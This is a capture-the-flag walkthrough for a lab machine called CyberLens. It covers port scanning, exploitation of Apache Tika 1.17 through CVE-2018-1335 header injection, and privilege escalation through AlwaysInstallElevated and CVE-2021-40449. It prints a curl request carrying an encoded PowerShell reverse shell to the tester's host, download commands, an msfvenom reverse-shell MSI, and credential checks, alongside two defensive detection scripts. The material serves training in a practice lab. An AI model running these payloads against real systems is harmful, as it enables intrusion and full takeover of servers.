CyberLens
Can you exploit the CyberLens web server and discover the hidden flags?
This work by Manav G Krishna is licensed under CC BY-NC 4.0
Machine IP: 10.10.131.149
Nmap Scan:
nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn
Nmap scan report for cyberlens.thm (10.10.131.149)
Host is up (0.15s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
| Supported Methods: GET POST OPTIONS HEAD TRACE
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Issuer: commonName=CyberLens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-17T05:04:27
| Not valid after: 2024-11-16T05:04:27
| MD5: 0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb
|_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T05:18:33+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
61777/tcp open http Jetty 8.y.z-SNAPSHOT
| http-methods:
| Supported Methods: POST GET PUT OPTIONS HEAD
|_ Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=5/18%OT=80%CT=1%CU=30699%PV=Y%DS=2%DC=T%G=Y%TM=6648
OS:3A2F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%
OS:TS=U)SEQ(SP=104%GCD=1%ISR=105%TI=I%CI=I%TS=U)SEQ(SP=104%GCD=1%ISR=105%TI
OS:=I%CI=I%II=I%SS=S%TS=U)SEQ(SP=105%GCD=2%ISR=106%TI=I%CI=I%II=I%SS=S%TS=U
OS:)OPS(O1=M508NW8NNS%O2=M508NW8NNS%O3=M508NW8%O4=M508NW8NNS%O5=M508NW8NNS%
OS:O6=M508NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%D
OS:F=Y%T=80%W=FFFF%O=M508NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=
OS:Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R
OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=
OS:80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z
OS:)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-05-18T05:18:36
|_ start_date: N/A
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 148.60 ms 10.11.0.1
2 149.53 ms cyberlens.thm (10.10.131.149)
Let us add cyberlens.thm to the hosts file as mentioned in the description of the room.
Command:
echo '10.10.131.149 cyberlens.thm' | sudo tee -a /etc/hosts
Instead of waiting for the scan to complete fully, we can navigate to the website on port 80. As the verbose switch (-v) is being used in the Nmap command, we will see the open ports straight away, as and when they are found.
Checking out Port 80:

We can see what Wappalyzer tells us:

The web server running is Apache 2.4.57.
We have a contact form here:

Testing out a basic XSS payload:

Now let's set up a netcat listener on port 80. If the above payload works we should get a connection back on our listener, which shows that the server has reached out to our machine. The IP specified in the payload is the tun0 interface IP.

But unfortunately we don't get any connection on the listener.
Nothing out of the blue was found while directory busting. No results were yielded from VHOST busting.
There is a feature on the site called CyberLens Image Extractor:

Basically we can upload files and the feature fetches the metadata present within those files. Metadata is the hidden data that accompanies every image, video, and file you encounter.
Checking out this feature by intercepting the request in Burp Suite:
After turning on intercept in Burp, we just have to upload a file and click on the Get Metadata button, and the request will get captured in Burp:


Forward the above request and we will be on the one that we need:

This shows that the metadata extraction takes place on port 61777. We can now check the Nmap scan, which should have completed fully by now, and also check out the website on that port:


We can see that it is using Apache Tika 1.17. It is an open-source software library that detects and extracts metadata and structured text from a variety of file formats. This is what is being used to fetch the metadata from the files that we upload in the CyberLens Image Extractor feature.
We can confirm this by looking at the metadata it extracts, mainly the Parsing headers; I have uploaded a PDF file this time:

The endpoint, as seen from the request, is /meta. This is where our request is sent after clicking Get Metadata, and the data is being PUT to the server:

Now that we fully know what exactly is happening, we can look for exploits for Apache Tika 1.17, and this leads us to CVE-2018-1335.
CVE-2018-1335 - Command Injection in Apache Tika:
Note: I will be showing 3 ways to get the foothold by exploiting the above mentioned CVE. The first way is doing it manually, the second via the POC (python script) and the final way via Metasploit.
Manual Exploitation to get a Reverse Shell:
Towards the end of the above attached blog, we find this:

Based on this, we have to include a few headers, change the Content-Type and also add the JS code in the body of the request.
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');
What these two JS lines do: first, they create a WScript.Shell object, which provides access to Windows shell functionality (WScript is the host that interprets and executes scripts written in languages such as VBScript and JScript); second, that object is used to run the command cmd /c calc.exe, which opens Calculator on the target machine.
The command can be modified by us to get a reverse shell instead.
Base64 Encoded PS Reverse Shell:

Setting up a listener on port 445:

Final Request:
The extra headers include:
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
And the Content-Type also has to be changed to image/jp2.
The request body:
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e 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');
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Content-Type: image/jp2
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e 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');

The same can be done through curl too:
Command:
curl -X PUT http://cyberlens.thm:61777/meta \
-H "Content-Type: image/jp2" \
-H 'X-Tika-OCRTesseractPath: "cscript"' \
-H 'X-Tika-OCRLanguage: //E:Jscript' \
--data '
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('\''cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA='\'');
'
We just send the request and we can check out the listener:

Now we have successfully got a shell as the user cyberlens and we can get the user flag in this user's Desktop folder.
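The request shape used above has properties a defender can key on: a quoted X-Tika-OCRTesseractPath, an OCR language value that is a command-line switch rather than a language code, and an image Content-Type on a body that carries script text instead of image bytes. The checker below is an added example, not code from the room, its author or Apache Tika. It parses raw HTTP request bytes the way a reverse proxy or WAF placed in front of port 61777 would see them and reports each of those mismatches; the three sample requests are constructed, and the encoded command from the original request is replaced by a placeholder.

```python
"""Flag Tika server requests whose headers try to redirect OCR to another program.

Added example for this write-up; not code from the room, the author or Apache Tika.
Assumes raw HTTP/1.1 request bytes as a proxy in front of the Tika port would see them.
"""
import re

# Leading bytes a body should carry for its declared Content-Type (constructed table).
MAGIC = {
    "image/jp2": b"\x00\x00\x00\x0cjP",
    "image/png": b"\x89PNG",
    "image/jpeg": b"\xff\xd8\xff",
    "application/pdf": b"%PDF",
}
# Legitimate X-Tika-OCRLanguage values are tesseract language codes: eng, eng+deu, chi_sim ...
LANG_RE = re.compile(r"[a-z]{3}(_[a-z]+)?(\+[a-z]{3}(_[a-z]+)?)*")
# Only the parsing endpoints hand the uploaded bytes to the OCR parser.
PARSE_ENDPOINTS = ("/meta", "/tika", "/rmeta")


def parse_request(raw: bytes):
    """Split raw request bytes into (method, path, headers, body); header names are lowercased."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:  # tolerate bare-LF requests from hand-written tooling
        head, _, body = raw.partition(b"\n\n")
    lines = head.decode("latin-1").splitlines()
    parts = lines[0].split()
    method, path = parts[0].upper(), parts[1]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def assess_tika_request(raw: bytes) -> list:
    """Return the reasons a request looks like OCR-config abuse; an empty list means nothing seen."""
    method, path, headers, body = parse_request(raw)
    reasons = []
    if method != "PUT" or not path.startswith(PARSE_ENDPOINTS):
        return reasons

    tess = headers.get("x-tika-ocrtesseractpath")
    if tess is not None:
        if '"' in tess or "'" in tess:
            reasons.append("X-Tika-OCRTesseractPath contains quote characters; a directory path needs none")
        else:
            reasons.append("client overrides the tesseract directory; confirm this client is expected")

    lang = headers.get("x-tika-ocrlanguage")
    if lang is not None and not LANG_RE.fullmatch(lang.lower()):
        reasons.append("X-Tika-OCRLanguage is not a language code (looks like a switch): " + lang)

    ctype = headers.get("content-type", "").split(";")[0].strip().lower()
    magic = MAGIC.get(ctype)
    if magic is not None and not body.startswith(magic):
        reasons.append(f"body does not start with the {ctype} signature; declared type is false")
    return reasons


# Constructed samples: a plain upload, an OCR-tuned upload with a real language code,
# and the shape of the request above with the encoded command replaced by a placeholder.
BENIGN_PDF = (
    b"PUT /meta HTTP/1.1\r\nHost: cyberlens.thm:61777\r\n"
    b"Content-Type: application/pdf\r\n\r\n"
    b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n"
)
BENIGN_OCR = (
    b"PUT /tika HTTP/1.1\r\nHost: cyberlens.thm:61777\r\n"
    b"Content-Type: image/png\r\nX-Tika-OCRLanguage: eng+deu\r\n\r\n"
    b"\x89PNG\r\n\x1a\n" + b"\x00" * 8
)
SUSPICIOUS = (
    b"PUT /meta HTTP/1.1\r\nHost: cyberlens.thm:61777\r\nContent-Type: image/jp2\r\n"
    b'X-Tika-OCRTesseractPath: "cscript"\r\nX-Tika-OCRLanguage: //E:Jscript\r\n\r\n'
    b'var oShell = WScript.CreateObject("WScript.Shell");\r\n'
    b"var oExec = oShell.Exec('PLACEHOLDER_COMMAND');\r\n"
)

if __name__ == "__main__":
    for name, raw in (("benign pdf", BENIGN_PDF), ("benign ocr", BENIGN_OCR), ("suspicious", SUSPICIOUS)):
        print(name, "->", assess_tika_request(raw) or "no findings")
```

Any override of the tesseract directory is reported, even when unquoted, because ordinary clients of the Image Extractor never send it; the quoted form and the switch-shaped language value are the two signals that separate this request from a normal upload. Filtering is a stop-gap: CVE-2018-1335 affects Tika up to 1.17 and was fixed in 1.18, so upgrading the server is the actual remediation.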
Using POC to get a Reverse Shell:

Command:
python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e 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'
The Base64 Encoded PS Payload is what is being used here too.
We have now got the shell:

Using Metasploit:
Command:
msfconsole -q   # starts Metasploit in quiet mode, i.e. without printing the banner

Setting the options:
Running systeminfo from the shell that we previously got via the above mentioned ways gives us the system type:
Command:
systeminfo | findstr /B /C:"System Type"

It is a 64-bit machine, so while setting the payload option we have to set a 64-bit payload.


Now we just run the exploit:

Yet again, we have a shell.
Let us see if we can do some enumeration and find whether passwords of any users are stored in files etc., which is a pretty common finding in real world pentests too. Let us check a few common file types that passwords could be stored in, such as .txt, .xml, .ini etc.
We can first look within CyberLens's home folder.
Command:
Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini

There is a file called CyberLens-Management.txt.
Let us check it out:

And indeed we find CyberLens's password.
Also, the Nmap scan shows us that port 3389 is open. Let us confirm whether we can RDP in as CyberLens:
Command:
netexec rdp cyberlens.thm -u CyberLens -p 'insert_password'

NetExec says Pwn3d!. This means the creds are valid and we can RDP in.
Note: RDPing in is not needed considering we already have a shell as CyberLens. Below are the steps to follow if you want to try it out.
Command:
xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution


We have got in.
Privilege Escalation to SYSTEM (Intended Way):
We can first check whether Windows Defender is running or not:
Command:
sc.exe query WinDefend

We can see that the STATE is STOPPED, which means Defender is not running.
Now let us use WinPEAS on the machine by serving it via a python server; a 64-bit WinPEAS is what we need as the target system is 64-bit.
We can write to the home folder or Desktop folder of the user CyberLens as we have Full Control (F) in these locations:

Command:
IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe


Running WinPEAS:

We then come across this:

We can see that the AlwaysInstallElevated policy is set to 1 (Enabled) for both the HKLM (HKEY_LOCAL_MACHINE) and HKCU (HKEY_CURRENT_USER) registry hives. This policy allows non-administrative users to install software with elevated privileges. In this case it is enabled globally (for all users) as well as for the current user on the system.
This policy allows a regular user to install MSI files with high/elevated privileges.
Manually enumerating the status of AlwaysInstallElevated:
Commands:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
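As an added example (not code from the room, its author or WinPEAS), the script below evaluates the output of the two reg query commands above the way an audit job would: it parses what reg.exe prints, treats an absent value as not set, and reports the policy as exploitable only when both the HKLM and HKCU values read 1, because Windows Installer honours the policy only when both are enabled. The sample outputs are constructed copies of reg.exe's format so the logic runs anywhere; run_reg_query() is an assumed helper for live use on a Windows host.

```python
"""Evaluate AlwaysInstallElevated from 'reg query' output.

Added example for this write-up; not code from the room or from WinPEAS.
Windows Installer honours the policy only when BOTH the HKLM and HKCU values are 1,
so a single hive reading 1 is a misconfiguration to clean up but not yet exploitable.
"""
import re
import subprocess

POLICY_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
VALUE_NAME = "AlwaysInstallElevated"
# reg.exe prints the value as:    AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)


def parse_reg_query(output: str):
    """Return the DWORD as an int, or None when reg.exe reported the key/value as missing."""
    match = VALUE_RE.search(output)
    return int(match.group(1), 16) if match else None


def run_reg_query(hive: str) -> str:
    """Assumed live helper (Windows only): run reg query for one hive and return stdout+stderr."""
    proc = subprocess.run(
        ["reg", "query", hive + "\\" + POLICY_KEY, "/v", VALUE_NAME],
        capture_output=True, text=True,
    )
    return proc.stdout + proc.stderr


def assess_always_install_elevated(hklm_output: str, hkcu_output: str) -> dict:
    """Combine both hive results; 'exploitable' is True only when both values are 1."""
    hklm = parse_reg_query(hklm_output)
    hkcu = parse_reg_query(hkcu_output)
    exploitable = hklm == 1 and hkcu == 1
    if exploitable:
        advice = "set both values to 0 or delete them; any user can install MSI packages as SYSTEM"
    elif hklm == 1 or hkcu == 1:
        advice = "only one hive is set; the policy is inactive, but clear it before a GPO completes it"
    else:
        advice = "policy not enabled"
    return {"hklm": hklm, "hkcu": hkcu, "exploitable": exploitable, "advice": advice}


# Constructed reg.exe outputs matching the WinPEAS finding above (both hives set to 1).
HKLM_ENABLED = (
    "\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\r\n"
    "    AlwaysInstallElevated    REG_DWORD    0x1\r\n\r\n"
)
HKCU_ENABLED = HKLM_ENABLED.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
# Constructed copy of what reg.exe prints on a host where the value was never set.
VALUE_MISSING = "ERROR: The system was unable to find the specified registry key or value.\r\n"

if __name__ == "__main__":
    print(assess_always_install_elevated(HKLM_ENABLED, HKCU_ENABLED))
    print(assess_always_install_elevated(HKLM_ENABLED, VALUE_MISSING))
```

On the target the live call would be assess_always_install_elevated(run_reg_query("HKLM"), run_reg_query("HKCU")); the parser reads the ERROR line as "value absent" rather than failing, which is the common case on a correctly configured host.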

This can be abused by us in order to escalate privileges to become SYSTEM by crafting a malicious MSI file.

We can create a .msi payload using msfvenom, and this can be served via a python server.
Command:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi

Command:
IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi


Now let us set up a listener on port 443:

Running the bad MSI file:
Command:
msiexec.exe /i evil.msi

Now let us check out our listener:

We have successfully got a shell as SYSTEM. The admin flag can be found in the Desktop folder of Administrator.
The same can be done via Metasploit too (exploit/windows/local/always_install_elevated).
Privilege Escalation to SYSTEM (Unintended Way):
Let us check out the OS Version on the machine:
Command:
systeminfo | findstr /B /C:"OS Version"

It is 10.0.17763 N/A Build 17763. We can now look for exploits for this version, and we get this in one of the results:


It is an LPE (Local Privilege Escalation) exploit.
CVE-2021-40449 (Win32k - LPE):
We can check out the repo:
We can see that the exact version that we have on the target is vulnerable to this LPE exploit. This can be used to get to SYSTEM.
The repo doesn't have pre-compiled binaries. The .sln file has to be compiled to an .exe file, which can be done using Visual Studio. There are other ways to do it too, but it is a lengthy procedure. Instead we can exploit this in an easier way using Metasploit.
Note: We can use the meterpreter shell that we had got by exploiting the Apache Tika CVE initially to run the above mentioned LPE exploit, or we can use the web_delivery exploit in the shell that we got by manually exploiting the Tika CVE. The easier and more practical way of getting a meterpreter shell would be through web_delivery. But in this case, since we have a meterpreter shell from before, I will be using that, as it is a shell obtained in the context of this machine, and mainly because you have the option to choose which way you would like to follow to get to SYSTEM. Also, for the LPE exploit, a couple of repos containing the pre-built binary were found but they didn't work.
Getting the shell as CyberLens by exploiting CVE-2018-1335:

CVE-2021-40449 Exploitation:

The initial meterpreter shell is backgrounded (bg) so that it can be used with the exploit.

Setting the options:
We have to first set the SESSION, which is basically the initial shell that we had obtained. This is how the exploit module knows which session to perform the LPE exploit on.

Note: The SESSION number is 3 for me as this is the 3rd session that I have opened. This won't be the same in your case; it depends on how many sessions were opened before using the Apache Tika Metasploit exploit. Make sure to run the meterpreter command sessions to find out your current session ID.

We had left LPORT at the default setting of port 4444 initially while performing the Tika exploit via Metasploit. Now we have to use a different LPORT for the exploit to listen on, so we can set it to 5555.
Now we just run the exploit:

We are SYSTEM again.
We could also find the LPE exploit in a simpler way through the meterpreter shell itself by using Metasploit's Lester (Local Exploit Suggester):
This module scans the system and finds and lists possible vulnerabilities.
Command:
run post/multi/recon/local_exploit_suggester

Note: All exploits mentioned by the suggester were tried out, but the only one that worked was CVE-2021-40449. Also, there are multiple post-exploitation recon tools like Lester that yield the same result as shown above.
Room solved!!